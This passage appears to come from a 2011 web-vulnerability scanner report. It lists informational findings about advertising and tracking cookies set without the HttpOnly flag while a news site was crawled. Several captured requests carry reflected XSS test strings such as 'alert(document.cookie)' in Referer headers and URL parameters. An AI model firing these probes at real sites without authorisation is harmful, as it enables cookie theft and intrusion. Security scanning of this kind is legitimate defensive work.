User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 204 No Content
Date: Tue, 03 May 2011 15:41:38 GMT
X-Name: rtb-s10
Set-Cookie: Apache=173.193.214.243.1304437298819729; path=/
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
Content-Type: text/plain

13.92. http://csc.beap.ad.yieldmanager.net/i previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://csc.beap.ad.yieldmanager.net
Path:	/i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=s=1tatub96s08fd&t=1304437229;path=/; expires=

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(124e7sdam(gid$ab82e238-759b-11e0-b5b1-1fe60dfbb75c,st$1304437227897035,v$1.0))&t=blank&al=(as$128nhs120,aid$l1bVpWKIVSs-,bi$648366551,ct$25,at$0) HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=122

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:40:29 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=1tatub96s08fd&t=1304437229;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.93. http://cw-m.d.chango.com/m/cw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cw-m.d.chango.com
Path:	/m/cw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=d1f7cae6-759b-11e0-b4f3-00259031f86c; Domain=chango.com; expires=Fri, 30 Apr 2021 15:41:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.94. http://d.xp1.ru4.com/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/activity

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X1ID=AG-00000001217181099; domain=.ru4.com; path=/; expires=Tue, 03-Nov-2012 11:41:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.95. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=1190:audiencescience300x250;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:54 GMT;path=/;domain=.zedo.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x250; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

13.96. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=2241452;expires=Wed, 02 May 2012 15:40:45 GMT;domain=.zedo.com;path=/;
FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:45 GMT;path=/;domain=.zedo.com;
ZEDOIDA=-SHATcGt89bdPdY10luzTKFT~050311;expires=Fri, 30 Apr 2021 15:40:45 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.97. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

FFgeo=2241452;expires=Wed, 02 May 2012 15:41:11 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.98. http://h.zedo.com/init/0.20843081758144966/g.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h.zedo.com
Path:	/init/0.20843081758144966/g.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.99. http://h.zedo.com/init/0.7280766281441555/g.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h.zedo.com
Path:	/init/0.7280766281441555/g.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
ZEDOIDA=@G7EzAoBADQAAGbr14EAAAAF~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:15 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=2241452; path=/; EXPIRES=Wed, 02-May-12 15:41:15 GMT; DOMAIN=.zedo.com
Set-Cookie: ZEDOIDA=@G7EzAoBADQAAGbr14EAAAAF~050311; path=/; expires=Fri, 30-Apr-21 15:41:15 GMT; domain=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Length: 42
Expires: -1
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

13.100. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=f37741cc-dd69-4eaf-b5cb-bc2965d953d9;Path=/;Domain=.w55c.net;Expires=Thu, 02-May-13 15:41:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.101. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2lkaebs01171xcfgwn0ixqhg0c7xf0033f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
rdrlst=4021194lkmm97000000013f010znmlkmhha000000023f02; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
sglst=20a0s8nelkmhha000000023f020j02502abflkmhha000000023f020j02502647lkmhha000000023f020j02502ag2lkmm97000000013f010j015019rylkmhha000000023f020j02502dg4lkmhha000000023f020j02502bnzlkmhha000000023f020j02502cgzlkmhha000000023f020j025020tilkmhha004rx0023f020j02502a6rlkmhha000000023f020j02502; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
vstcnt=417s010r024smk6127p10024nnav118e1022; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.102. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; domain=pubmatic.com; expires=Thu, 02-May-2013 15:41:12 GMT; path=/
PUBRETARGET=82_1399045272; domain=pubmatic.com; expires=Fri, 02-May-2014 15:41:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.103. http://k.collective-media.net/cmadj/cm.rev_lee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JY57=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ; expires=Tue, 31-May-2011 15:43:30 GMT; path=/; domain=.collective-media.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.104. http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.betrad.com
Path:	/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=48fcee67-e105-44b6-a7b4-3155749646eb; path=/; expires=Thu, 02 May 2013 15:41:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif?v=2&ttid=2&d=ad.doubleclick.net&m=5&r=0.34375685717210536 HTTP/1.1
Host: l.betrad.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=48fcee67-e105-44b6-a7b4-3155749646eb; path=/; expires=Thu, 02 May 2013 15:41:38 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Tue, 03 May 2011 15:41:38 GMT

13.105. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E0111C8501327E-4000010A603F3F3B[CE]; Expires=Sun, 1 May 2016 15:41:45 GMT; Domain=leeenterprises.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673?AQB=1&ndh=1&t=3/4/2011%2015%3A41%3A36%202%20300&ce=UTF-8&ns=leeenterprises&g=http%3A//www.maysville-online.com/favicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&r=http%3A//burp/show/1&cc=USD&ch=maysville-online.com&server=Maysville&c1=homepage&h1=Lee%20Enterprises%2CMaysville%2Cmaysville-online.com%2Chomepage%2C%2C%2C%2C&h2=Lee%20Enterprises%2Chomepage%2CMaysville%2Cmaysville-online.com%2C%2C%2C%2C&c34=%5BNo%20Previous%20Page%20Available%5D&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: leeenterprises.112.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:41:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E0111C8501327E-4000010A603F3F3B[CE]; Expires=Sun, 1 May 2016 15:41:45 GMT; Domain=leeenterprises.112.2o7.net; Path=/
Location: http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673?AQB=1&pccr=true&vidn=26E0111C8501327E-4000010A603F3F3B&&ndh=1&t=3/4/2011%2015%3A41%3A36%202%20300&ce=UTF-8&ns=leeenterprises&g=http%3A//www.maysville-online.com/favicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&r=http%3A//burp/show/1&cc=USD&ch=maysville-online.com&server=Maysville&c1=homepage&h1=Lee%20Enterprises%2CMaysville%2Cmaysville-online.com%2Chomepage%2C%2C%2C%2C&h2=Lee%20Enterprises%2Chomepage%2CMaysville%2Cmaysville-online.com%2C%2C%2C%2C&c34=%5BNo%20Previous%20Page%20Available%5D&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 02 May 2011 15:41:45 GMT
Last-Modified: Wed, 04 May 2011 15:41:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www83
Content-Length: 0
Content-Type: text/plain

13.106. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E011360501391F-600001044044E027[CE]; Expires=Sun, 1 May 2016 15:42:36 GMT; Domain=leeenterprises.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881?AQB=1&ndh=1&t=3/4/2011%2015%3A42%3A33%202%20300&ce=UTF-8&ns=leeenterprises&g=http%3A//www.maysville-online.com/content/%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&r=http%3A//burp/show/2&cc=USD&ch=maysville-online.com&server=Maysville&c1=homepage&h1=Lee%20Enterprises%2CMaysville%2Cmaysville-online.com%2Chomepage%2C%2C%2C%2C&h2=Lee%20Enterprises%2Chomepage%2CMaysville%2Cmaysville-online.com%2C%2C%2C%2C&c34=no%20value&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: leeenterprises.112.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 15:42:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E011360501391F-600001044044E027[CE]; Expires=Sun, 1 May 2016 15:42:36 GMT; Domain=leeenterprises.112.2o7.net; Path=/
Location: http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881?AQB=1&pccr=true&vidn=26E011360501391F-600001044044E027&&ndh=1&t=3/4/2011%2015%3A42%3A33%202%20300&ce=UTF-8&ns=leeenterprises&g=http%3A//www.maysville-online.com/content/%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&r=http%3A//burp/show/2&cc=USD&ch=maysville-online.com&server=Maysville&c1=homepage&h1=Lee%20Enterprises%2CMaysville%2Cmaysville-online.com%2Chomepage%2C%2C%2C%2C&h2=Lee%20Enterprises%2Chomepage%2CMaysville%2Cmaysville-online.com%2C%2C%2C%2C&c34=no%20value&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 02 May 2011 15:42:36 GMT
Last-Modified: Wed, 04 May 2011 15:42:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www34
Content-Length: 0
Content-Type: text/plain

13.107. http://open.ad.yieldmanager.net/a1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://open.ad.yieldmanager.net
Path:	/a1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BX=ek8k2sl67ofpa&b=4&s=o9&t=122;path=/; expires=Tue, 03-May-2013 20:00:00 GMT;domain=.yieldmanager.net
S=s=043pp296s08fc&t=1304437228;path=/; expires=

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.108. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EM4BCgHUBpGX; expires=Mon, 01-Aug-2011 15:41:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.109. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-01-0VIaSjnOLg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EMQBBgHUBg; expires=Mon, 01-Aug-2011 15:41:30 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.110. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=4212%3D1; expires=Thu, 02-Jun-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com
rpx=4212%3D11695%2C0%2C1%2C%2C; expires=Thu, 02-Jun-2011 15:41:38 GMT; path=/; domain=.pixel.rubiconproject.com
put_1185=3658195966029417970; expires=Sat, 02-Jul-2011 15:41:38 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.111. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i=5970d0a2-50bf-4e81-9e33-99fc5b6ccb0d; expires=Thu, 02-May-2013 15:41:37 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.112. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3658195966029417970; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:39 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACID=cA130013044372470037; domain=advertising.com; expires=Thu, 02-May-2013 15:40:47 GMT; path=/
ASCID=cA130013044372470037; domain=advertising.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.114. http://rs.gwallet.com/r1/pixel/x420r7209935 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x420r7209935

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4635041587697275136; Max-Age=31536000; Path=/; Domain=gwallet.com; Version=1
BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTA0IDg4ODg=;expires=Tue, 02-Feb-2016 18:09:42 GMT;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.115. http://servedby.flashtalking.com/imp/3/15881 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

flashtalkingad1="GUID=12181FA2A61751";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

13.116. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uuid=4dc0222f-bc32-582b-1dda-5df0ca507885; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT
ts=1304437295; domain=.mathtag.com; path=/; expires=Wed, 02-May-2012 15:41:35 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.117. http://tag.contextweb.com/TagPublish/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2W4=CT-USR; expires=Tue, 31-May-2011 15:41:28 GMT; path=/; domain=.contextweb.com
V=Yu2zAy2GkRR5; domain=.contextweb.com; expires=Thu, 03-May-2012 15:41:28 GMT; path=/
503597_3_94417=1304437289024; domain=.contextweb.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response

13.118. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=u9HjDXV5c/WBvF/1; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com
bkc=KJhqpzU9LcAp9ymdhQa4HQRsC+P9F7DgvMIsOzc7OwnlEZ5Q6aJYXamSD4ZmeSCXW9lM0dW01WuG13nylbiC0GwLQdapsPc89vLosz6=; expires=Sun, 30-Oct-2011 16:06:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.119. http://tags.bluekai.com/site/3358 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

